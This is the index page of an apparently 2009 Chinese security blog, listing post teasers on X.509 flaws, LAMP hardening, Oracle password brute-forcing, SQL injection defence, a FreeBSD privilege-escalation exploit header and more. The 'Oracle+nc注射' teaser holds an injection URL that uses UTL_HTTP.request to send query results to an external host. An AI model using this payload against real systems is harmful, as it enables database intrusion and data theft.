浏览模式: 标准 | 列表全部文章

黑帽大会上Kaminsky揭露X.509证书严重漏洞

Submitted by Akira on 2009, August 10, 2:18 PM

Kaminsky在黑帽大会上演示了公共密钥架构VeriSign中X.509加密,而且认证授权还在继续使用MD5和更糟的MD2错误的哈希运算。

» 阅读全文

Tags: 黑帽大会, kaminsky, x.509证书, 严重漏洞

业界资讯 | 评论:0 | Trackbacks:0 | 阅读:133

打造Linux下超安全的LAMP服务器

Submitted by Akira on 2009, August 10, 2:12 PM

本文全面细致的介绍了在Linux下加固apache+php+mysql的方法,通过仔细阅读本文,你可以快速掌握安全配置apache,php,和mysql的方方面面,还有chroot这个前沿而强悍的技术,依靠这些知识,完全可以让你的WWW服务器在层出不穷的SQL注射(SQL Injection)和CSS跨站脚本攻击(Cross Site Script)中屹立不倒。

» 阅读全文

Tags: linux, lamp, 服务器

技术文档 | 评论:0 | Trackbacks:0 | 阅读:74

通过Orabrute暴力破解oracle密码

Submitted by Akira on 2009, July 11, 10:14 AM

1 标准的Oracle 密码可以由英文字母,数字,#,下划线(_),美元字符($)构成,密码的最大长度为30 字符;Oracle 密码不能以"$","#","_"或任何数字开头;密码不能包含"SELECT","DELETE","CREATE"这类的Oracle/SQL 关键字。
2 Oracle 的弱算法加密机制:两个相同的用户名和密码在两台不同的Oracle 数据库机器中,将具有相同的
哈希值。这些哈希值存储在SYS.USER$表中。可以通过像DBA_USERS 这类的视图来访问。
3 Oracle 默认配置下,每个帐户如果有10 次的失败登录,此帐户将会被锁定。但是SYS 帐户在Oracle 数
据库中具有最高权限,能够做任何事情,包括启动/关闭Oracle 数据库。即使SYS 被锁定,也依然能够访问
数据库。

» 阅读全文

Tags: orabrute, 暴力破解, oracle密码

入侵渗透 | 评论:0 | Trackbacks:0 | 阅读:96

MySQL二次漏洞的简单防范

Submitted by Akira on 2009, July 11, 10:11 AM

众所周知,数据库操作中对于一些特殊字符(例如单引号“'”、反斜线“\”等元字符)有着严格的限制,如果向数据库中写入的数据含有这样的特殊字符,操作将会带来不安全因素。所以对于用户输入的数据,我们完全认为它是没有安全性的,需要在程序中对其进行适当的过滤处理后,方可写入数据库。

» 阅读全文

Tags: mysql, 二次漏洞, 简单防范

技术文档 | 评论:0 | Trackbacks:0 | 阅读:121

MSSQL数据库被插入木马批量删除sql语句

Submitted by Akira on 2009, July 11, 10:10 AM

MSSQL数据库被插入木马批量删除sql语句
MSSQL数据库被插入木马批量删除sql语句,一朋友服务器被批量插入了js木马,几乎每个表的文本字段都被插入了,网上找了这个sql语句,留着备用。

» 阅读全文

Tags: mssql, 批量删除, sql语句

技术文档 | 评论:0 | Trackbacks:0 | 阅读:94

命令行下建立VPN

Submitted by Akira on 2009, July 11, 10:03 AM

.前提
服务里 windows防火墙停止(或者麻烦点可以把router协议,端口1723配进去)
远程注册表服务必须开启
server服务必须开启
router路由服务必须开启

» 阅读全文

Tags: vpn, 内网渗透

技术文档 | 评论:0 | Trackbacks:0 | 阅读:103

Oracle+nc注射

Submitted by Akira on 2009, July 11, 10:01 AM

url语句简单如下所示:

http://localhost/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--

内容如下:

» 阅读全文

Tags: oracle注射, oracle, sql injection, 渗透

入侵渗透 | 评论:0 | Trackbacks:0 | 阅读:90

FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit

Submitted by Akira on 2009, July 11, 9:53 AM

 * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
 *
 * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
 * (CVE-2008-3531) vulnerability:

» 阅读全文

Tags: freebsd 7.0/7.1, vfs.usermount, exploit

漏洞信息 | 评论:0 | Trackbacks:0 | 阅读:65

Records:11512345678910»